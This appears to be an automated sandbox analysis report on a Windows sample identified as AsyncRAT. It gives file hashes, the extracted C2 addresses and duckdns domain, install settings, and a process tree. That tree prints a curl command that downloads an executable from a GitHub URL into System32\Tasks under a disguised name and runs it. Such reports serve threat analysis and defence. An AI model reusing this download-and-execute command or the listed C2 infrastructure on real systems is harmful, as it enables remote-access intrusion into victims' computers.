Overview

overview

10

Static

static

3

0133bd25af...31.exe

windows7-x64

1

0133bd25af...31.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    94s
  • max time network
    95s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-12-2024 05:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    0133bd25af53905513b2123f49e8de6dcb7a2c8c4021b444e1f557b5462f8f31.exe

  • Size

    573KB

  • MD5

    c39b2855ca915b631eda59221242a492

  • SHA1

    0e8c5d616d5cf17b0dcc891044e67770d1b8f28c

  • SHA256

    0133bd25af53905513b2123f49e8de6dcb7a2c8c4021b444e1f557b5462f8f31

  • SHA512

    a209d2fb399fd847197d8f901222d45a93a76868081dcce0d91ad2ed618e15b5d5b88ff0db2534b280d469e082fba11abbe4e10c53d9af09a6a2eda7fb0a481b

  • SSDEEP

    12288:gD+ImWu7YOwR+7Wq+kIN0xkGtxCtq30JCSHvi7oA:gDKWu/w47WRoxkG7Cs30pi71

Score
10/10
asyncratdefaultrat

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

C2

127.0.0.1:2035

147.185.221.16:2035

147.185.221.19:2035

121637121.duckdns.org:2035
Mutex

I8EJ82H739UG

Attributes
  • delay

    1

  • install

    true

  • install_file

    Update.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Async RAT payload 1 IoCs
    rat
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0133bd25af53905513b2123f49e8de6dcb7a2c8c4021b444e1f557b5462f8f31.exe
    "C:\Users\Admin\AppData\Local\Temp\0133bd25af53905513b2123f49e8de6dcb7a2c8c4021b444e1f557b5462f8f31.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:728
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/SkarSys/Vane.cc-Skar-Fortnite-self-leak/main/um/AUTH/kdmapper.exe --output C:\Windows\System32\Tasks\kerneldat234.exe >nul 2>&1 && C:\Windows\System32\Tasks\kerneldat234.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3884
      • C:\Windows\system32\curl.exe
        curl https://raw.githubusercontent.com/SkarSys/Vane.cc-Skar-Fortnite-self-leak/main/um/AUTH/kdmapper.exe --output C:\Windows\System32\Tasks\kerneldat234.exe
        3⤵
        • Drops file in System32 directory
        PID:2340
      • C:\Windows\System32\Tasks\kerneldat234.exe
        C:\Windows\System32\Tasks\kerneldat234.exe
        3⤵
        • Executes dropped EXE
        PID:1596

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Windows\System32\Tasks\kerneldat234.exe
    Filesize

    48KB

    MD5

    a64c195587c96e2d3dabe451e7ebb496

    SHA1

    56b34ea8794487287f4d13708c56e46012417e9b

    SHA256

    f879d638d1ff0dd11471d38f62361315bb43b77d3605ec9ff67b149f435dadcc

    SHA512

    b9b600898e094832cd598182002fddab9506166fc9104994651aa83b8c96f7339901fec258978ecaafce393ac6c453280ccf22061b40839703d1760a6f3108cd

    Download Submit

  • memory/1596-4-0x00007FF9E2373000-0x00007FF9E2375000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1596-5-0x0000000000290000-0x00000000002A2000-memory.dmp

    Filesize

    72KB

    Download

  • memory/1596-6-0x00007FF9E2370000-0x00007FF9E2E31000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1596-7-0x00007FF9E2370000-0x00007FF9E2E31000-memory.dmp

    Filesize

    10.8MB

    Download